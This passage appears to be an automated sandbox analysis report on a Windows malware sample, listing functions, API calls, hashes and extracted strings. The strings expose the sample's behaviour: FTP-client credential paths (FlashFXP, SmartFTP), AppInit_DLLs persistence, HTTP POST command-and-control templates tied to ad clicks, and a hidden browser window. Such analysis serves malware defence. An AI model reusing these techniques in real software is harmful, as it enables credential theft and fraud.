                          • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                          • API String ID: 1994525040-4055253781
                          • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                          • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004099EB
                          • SysAllocString.OLEAUT32(?), ref: 004099F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </domain>$</url>$<domain>$<url>$http://
                          • API String ID: 2525500382-924421446
                          • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                          • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                          APIs
                          • SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
                          • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                          • Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                          • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                          • Sleep.KERNEL32(00002710), ref: 0040ADA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectInternet
                          • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                          • API String ID: 362191241-2593661552
                          • Opcode ID: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                          • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                          • Opcode Fuzzy Hash: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                          • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                          APIs
                          • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                          • __FindPESection.LIBCMT ref: 0040D8AC
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: FindHandlersScopeSectionTableValidate
                          • String ID:
                          • API String ID: 876702719-0
                          • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                          • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004088E4
                          • SysFreeString.OLEAUT32(?), ref: 004088E9
                          • SysFreeString.OLEAUT32(?), ref: 004089D3
                          • SysFreeString.OLEAUT32(?), ref: 004089D8
                          • SysFreeString.OLEAUT32(?), ref: 004089F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: +@
                          • API String ID: 3341692771-3835504741
                          • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                          • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                          APIs
                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                          • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                          • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                          • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                          • API String ID: 3100629401-2436734164
                          • Opcode ID: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                          • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                          • Opcode Fuzzy Hash: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                          • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
                          APIs
                          • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                          • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                          • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • _memset.LIBCMT ref: 004025DA
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                          • String ID: none
                          • API String ID: 2353737338-2140143823
                          • Opcode ID: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                          • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                          • Opcode Fuzzy Hash: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                          • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094E6
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                          • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                          APIs
                          • _memset.LIBCMT ref: 0040A26B
                          • SysAllocString.OLEAUT32(?), ref: 0040A28E
                          • SysAllocString.OLEAUT32(?), ref: 0040A296
                          • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                          • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                            • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                            • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                            • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                          • String ID: J(@
                          • API String ID: 3143865713-2848800318
                          • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                          • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                          • CloseHandle.KERNEL32(00000000), ref: 00407880
                          • GetTickCount.KERNEL32 ref: 00407888
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$CloseCountCreateHandleModuleNameTickTime
                          • String ID: UniqueNum
                          • API String ID: 1853814767-3816303966
                          • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                          • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB
                          APIs
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                          • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerRead
                          • String ID: UniqueNum$d$hOAd$x
                          • API String ID: 1528952607-1018652783
                          • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                          • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                          • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                          • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                          • API String ID: 4026185228-3265104503
                          • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                          • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409B00
                          • SysAllocString.OLEAUT32(?), ref: 00409B0E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </title>$</url>$<title>$<url>
                          • API String ID: 2525500382-2286408829
                          • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                          • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                          • Sleep.KERNEL32(00002710), ref: 0040AAC1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                          • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                          Strings
                          • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                          • 0, xrefs: 0040AA5B
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                          • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                          • API String ID: 3713053250-1268808612
                          • Opcode ID: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                          • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                          • Opcode Fuzzy Hash: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                          • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                          • CloseHandle.KERNEL32(?), ref: 00408452
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 1974014688-0
                          • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                          • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                          APIs
                          • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                          • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                          • String ID: POST
                          • API String ID: 961146071-1814004025
                          • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                          • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                          Strings
                          • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                          • folder, xrefs: 00405184
                          • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                          • personal favorites, xrefs: 00405176
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: EnvironmentExpandOpenStrings
                          • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                          • API String ID: 3923277744-821743658
                          • Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                          • Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040A0C0
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                          • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CreateHandleInitializeModuleWindow
                          • String ID: AtlAxWin$Shell.Explorer
                          • API String ID: 950422046-1300462704
                          • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                          • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                          APIs
                          • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                          • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                          • __aulldiv.LIBCMT ref: 004072E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: c{@
                          • API String ID: 3735792614-264719814
                          • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                          • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                          APIs
                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                          • __aulldiv.LIBCMT ref: 00407359
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: n(@
                          • API String ID: 3735792614-2525614082
                          • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                          • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                          • CharLowerW.USER32(?), ref: 0040ABA0
                          • GetCommandLineW.KERNEL32 ref: 0040ABC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CharCommandFileLineLowerModuleName
                          • String ID: /updatefile3$netprotdrvss.exe
                          • API String ID: 3118597399-3449771660
                          • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                          • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409FCE
                          • GetTickCount.KERNEL32 ref: 00409FDE
                          • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                          • DispatchMessageW.USER32(?), ref: 0040A009
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                          • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409F5B
                          • GetTickCount.KERNEL32 ref: 00409F5F
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                          • DispatchMessageW.USER32(?), ref: 00409F80
                          • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                          • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
